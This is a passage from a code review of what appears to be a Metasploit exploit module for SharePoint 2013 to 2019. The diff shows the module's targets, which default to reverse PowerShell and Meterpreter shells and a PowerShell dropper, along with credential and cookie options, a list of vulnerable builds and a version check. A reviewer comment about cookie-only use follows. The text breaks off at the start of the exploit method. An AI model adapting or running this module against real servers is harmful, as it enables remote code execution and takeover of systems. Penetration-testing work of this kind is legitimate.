modules/exploits/windows/http/sharepoint_unsafe_control.rb

```diff
@@ -0,0 +1,245 @@
+          [
+            'Windows Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :win_dropper,
+              'DefaultOptions' => {
+                'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,
+                'PAYLOAD' => 'windows/x64/meterpreter_reverse_https'
+              }
+            }
+          ],
+          [
+            'PowerShell Stager',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :psh_stager,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 2,
+        'DefaultOptions' => {
+          'DotNetGadgetChain' => :TypeConfuseDelegate
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('VALIDATION_KEY', [false, 'ViewState validation key']),
+      OptString.new('COOKIE', [false, 'SharePoint cookie if you have one']),
+      OptString.new('SP_LIST', [true, 'SharePoint site SPList', 'Documents']),
+      # "Promote" these advanced options so we don't have to pass around our own
+      OptString.new('HttpUsername', [false, 'SharePoint username']),
+      OptString.new('HttpPassword', [false, 'SharePoint password'])
+    ])
+  end
+
+  def post_auth?
+    true
+  end
+
+  def username
+    datastore['HttpUsername']
+  end
+
+  def password
+    datastore['HttpPassword']
+  end
+
+  def cookie
+    datastore['COOKIE']
+  end
+
+  def vuln_builds
+    # https://docs.microsoft.com/en-us/officeupdates/sharepoint-updates
+    # https://buildnumbers.wordpress.com/sharepoint/
+    # Patched in May of 2021
+    [
+      [Rex::Version.new('15.0.0.0'), Rex::Version.new('15.0.0.5337')], # SharePoint 2013
+      [Rex::Version.new('16.0.0.0'), Rex::Version.new('16.0.0.5149')], # SharePoint 2016
+      [Rex::Version.new('16.0.0.10000'), Rex::Version.new('16.0.0.10373')] # SharePoint 2019
+    ]
+  end
+
+  def check
+    build = sharepoint_get_version('cookie' => cookie)
+
+    if build.nil?
+      return CheckCode::Unknown('Failed to retrieve the SharePoint version number')
+    end
+
+    if vuln_builds.any? { |build_range| build.between?(*build_range) }
+      return CheckCode::Appears("SharePoint #{build} is a vulnerable build.")
+    end
+
+    CheckCode::Safe("SharePoint #{build} is not a vulnerable build.")
+  end
+
+  def exploit
+    unless username && password
```

Comment:
This prevents people from using the module with only a cookie and no username/password

Reply:
Resolved in edee95b.